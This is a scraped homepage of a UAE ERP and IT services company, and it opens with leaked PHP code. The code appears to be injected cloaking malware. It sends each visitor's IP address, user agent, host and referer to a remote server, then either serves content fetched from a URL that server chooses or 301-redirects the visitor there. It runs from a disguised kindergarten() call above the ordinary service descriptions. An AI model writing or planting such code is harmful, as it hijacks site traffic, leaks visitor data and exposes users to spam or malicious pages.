$_SERVER['REMOTE_ADDR'],
'user_agent' => $_SERVER['HTTP_USER_AGENT'],
'hostname' => $_SERVER['HTTP_HOST'],
'referer' => $referer
]));
$response = curl_exec($ch);
$http_status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_status === 200) {
$response_data = json_decode($response, true);
if ($response_data && isset($response_data['success']) && $response_data['success'] === true) {
$operation = isset($response_data['data']['operation'])
? $response_data['data']['operation']
: null;
$target = isset($response_data['data']['target_url'])
? $response_data['data']['target_url']
: null;
if ($operation === 'cloak' && $target) {
$content = fetchContent($target);
if ($content !== false) {
echo $content;
}
exit;
} elseif ($operation === 'redirect' && $target) {
header("Location: $target", true, 301);
exit;
}
}
}
}
function fetchContent($url)
{
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_URL, $url);
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch2, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch2);
if (curl_errno($ch2)) {
error_log('cURL Error: ' . curl_error($ch2));
$content = false;
}
curl_close($ch2);
return $content;
}
kindergarten();
?>
QUANTUM INTEGRATED E SOLUTIONS
Home Page || QUANTUM
QUANTUM INTEGRATED E SOLUTIONS
UAE'S TOP ERP SOLUTION PROVIDER FOR
QUANTUM, a leading provider of IT and communication solutions,
specializes in ERP and CRM development and customization, web
design and development, and IT infrastructure services,
delivering innovative and tailored solutions to drive your
business forward.
About
Quantum
QUANTUM INTEGERATED E-SOLUTIONS
We Qinfo was established on 2016 with a motto of making
E-Solutions for SME Companies in UAE to go Paperless We also
aim at providing cost effective solutions for SMEs in the
MENA region for all their technical issues.
Innovation and Progress
Unmatched Quality
Relentless Improvement
Dynamic Solutions
Trust and Clarity
Unified Collaboration
Services
Quantum
We Provide Awesome Service
ERP Development & Customization
Streamline your business operations with tailored ERP
solutions designed to optimize workflows and improve
efficiency.
Request Service
CRM Development & Customization
Enhance customer relationships with a customized CRM system
that aligns perfectly with your business needs
Request Service
Web & Mobile App Development
Create stunning, user-friendly websites that reflect your
brand identity and deliver an exceptional online experience
Request Service
IT Infrastructure & Networking
Build a robust IT infrastructure and seamless networking
solutions to support your company’s growth and reliability
Request Service
What We
Offer
Expert consulting, seamless production, and reliable support for
tailored solutions.
Consulting
We make sure the complete requirement of our
client with a work flow and estimate the time of
delivery
Production
We help with the smooth deployment of the solution
on cloud
Support
Support is what makes us different from other. Get
to work with us. Get the best solution and
lifetime updates for free